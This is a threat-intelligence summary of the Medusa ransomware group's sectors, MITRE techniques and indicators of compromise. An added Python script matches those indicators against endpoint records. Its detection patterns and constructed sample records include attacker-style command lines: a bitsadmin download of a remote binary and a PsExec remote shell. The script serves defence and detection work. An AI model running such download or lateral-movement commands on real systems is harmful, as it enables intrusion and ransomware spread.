Medusa Ransomware: An Escalating Threat with a Strong Online Footprint

The Medusa ransomware group emerged in 2023 with a notable presence on both the surface web and the dark web, operating under a ransomware-as-a-service model. By 2024 it had intensified attacks across the healthcare, manufacturing, education, government, and finance sectors worldwide, using SQL injection for initial access, compromised RMM tools for persistence, PowerShell for execution, and a blend of dark web and OSINT-driven public relations tactics to leak data and engage victims. #Medusa #OSINTWithoutBorders

Key points

  • Emergence: Medusa ransomware group surfaced in 2023 with a notable online presence.
  • Attack Rate: In 2024, they are launching cyberattacks at an increasing rate, with a projected total of over 200 victims by year-end.
  • Target Sectors: Medusa targets healthcare, manufacturing, education, government, and finance sectors across multiple countries.
  • Ransomware-as-a-Service: Operates on a profit-sharing model with affiliates receiving a significant portion of ransom payments.
  • Online Presence: Combines dark web activities with a clear web identity, notably through a blog and social media platforms.
  • Attack Techniques: Utilizes SQL injection vulnerabilities for initial access and employs various methods for persistence and execution.
  • Defense Evasion & Public Relations: Implements sophisticated techniques to bypass anti-malware solutions and uses unusual public relations tactics, including OSINT-focused sites.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – “Exploits known vulnerabilities (e.g., SQL injection) to gain access to target systems.”
  • [T1547] Boot or Logon Autostart Execution – “Uses compromised RMM tools and modifies registry keys to maintain access.”
  • [T1059] Command and Scripting Interpreter – “Employs PowerShell scripts to execute commands and launch ransomware.”
  • [T1021] Remote Services – “Transfers malicious files using tools like bitsadmin and PSExec to move within the network.”
  • [T1562] Impair Defenses – “Utilizes techniques to disable security software and evade detection.”

Indicators of Compromise

  • [IP Addresses] observed indicators – 103.217.41.10, 194.28.50.70, and 6 more IPs
  • [SHA-256] malware file hashes – 4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6, 657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980
  • [SHA-1] signatures – 5d5027305deb2cb2fd263fea9a6011af, 35dfc1fcb06fe31264a3fc7ff307e166 (note: both values are 32 hex characters, the length of an MD5 digest rather than the 40 characters of SHA-1; confirm the hash type with the source before loading them into a blocklist)
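The following is an added example, not tooling from the page or from Bitdefender, showing how a defender would operationalise the two lists above: it normalises the published IoCs (the two IPs and four hashes as printed; the "6 more IPs" are not given and so are omitted), infers each hash's algorithm from its length so a mislabelled digest is bucketed correctly, and sweeps a constructed set of endpoint records for matches on IP, file hash, or the bitsadmin/PsExec command lines named under T1021. The record format and the two command-line patterns are assumptions for illustration, not a real EDR schema or a vendor rule.

```python
import ipaddress
import re

# IoCs exactly as listed on the page (the unlisted "6 more IPs" are not included).
PAGE_IOCS = {
    "ip": ["103.217.41.10", "194.28.50.70"],
    "hash": [
        "4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6",
        "657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980",
        "5d5027305deb2cb2fd263fea9a6011af",  # labelled SHA-1 on the page, but MD5 length
        "35dfc1fcb06fe31264a3fc7ff307e166",  # labelled SHA-1 on the page, but MD5 length
    ],
}

# Hex digest length -> algorithm; used instead of trusting the label in the feed.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}

# Simplistic heuristics (assumed, not a vendor rule) for the tools named under T1021.
SUSPICIOUS_CMD = [
    ("bitsadmin transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("psexec remote execution", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
]


def classify_hash(value):
    """Return 'md5', 'sha1' or 'sha256' based on hex length, or None if not a hex digest."""
    v = value.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", v):
        return None
    return HASH_LENGTHS.get(len(v))


def build_ioc_index(iocs):
    """Normalise IoCs into lookup sets; hashes are bucketed by the algorithm their length implies."""
    index = {"ip": set(), "md5": set(), "sha1": set(), "sha256": set(), "invalid": []}
    for ip in iocs.get("ip", []):
        try:
            index["ip"].add(str(ipaddress.ip_address(ip.strip())))
        except ValueError:
            index["invalid"].append(ip)
    for h in iocs.get("hash", []):
        kind = classify_hash(h)
        if kind is None:
            index["invalid"].append(h)
        else:
            index[kind].add(h.strip().lower())
    return index


def scan_records(records, index):
    """Return (host, reason) findings for records that hit an IoC or a suspicious command line."""
    findings = []
    for r in records:
        host = r["host"]
        for field in ("src_ip", "dst_ip"):
            ip = r.get(field)
            if ip and ip in index["ip"]:
                findings.append((host, f"{field} {ip} matches a listed IP"))
        h = r.get("file_hash", "")
        if h:
            kind = classify_hash(h)
            if kind and h.strip().lower() in index[kind]:
                findings.append((host, f"{kind} {h[:12].lower()}... matches a listed hash"))
        cmd = r.get("cmdline", "")
        for label, pattern in SUSPICIOUS_CMD:
            if pattern.search(cmd):
                findings.append((host, f"{label}: {cmd}"))
    return findings


# Constructed sample telemetry (not real data); 192.0.2.0/24 is a documentation range.
SAMPLE_RECORDS = [
    {"host": "ws-01", "dst_ip": "194.28.50.70", "file_hash": "", "cmdline": "outlook.exe"},
    {"host": "srv-db-02", "dst_ip": "10.0.0.5",
     "file_hash": "4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6",
     "cmdline": "powershell.exe -nop -w hidden"},
    {"host": "srv-fs-03", "dst_ip": "10.0.0.7", "file_hash": "",
     "cmdline": "bitsadmin.exe /transfer job /download http://192.0.2.9/a.bin C:\\Temp\\a.bin"},
    {"host": "ws-04", "dst_ip": "8.8.8.8", "file_hash": "35DFC1FCB06FE31264A3FC7FF307E166",
     "cmdline": "chrome.exe"},
    {"host": "ws-05", "dst_ip": "1.1.1.1", "file_hash": "", "cmdline": "notepad.exe"},
    {"host": "ws-06", "dst_ip": "10.0.0.7", "file_hash": "",
     "cmdline": "psexec.exe \\\\srv-db-02 cmd.exe"},
]

if __name__ == "__main__":
    idx = build_ioc_index(PAGE_IOCS)
    print("hash buckets:", {k: len(v) for k, v in idx.items() if k != "ip"})
    for host, reason in scan_records(SAMPLE_RECORDS, idx):
        print(f"{host}: {reason}")
```

Running it shows the two "SHA-1" values landing in the md5 bucket and the sha1 bucket staying empty, which is the check worth doing before any feed is pushed to a blocklist; case-insensitive hash matching catches the uppercase digest on ws-04, and ws-05 produces no finding.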

Read more: https://www.bitdefender.com/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence/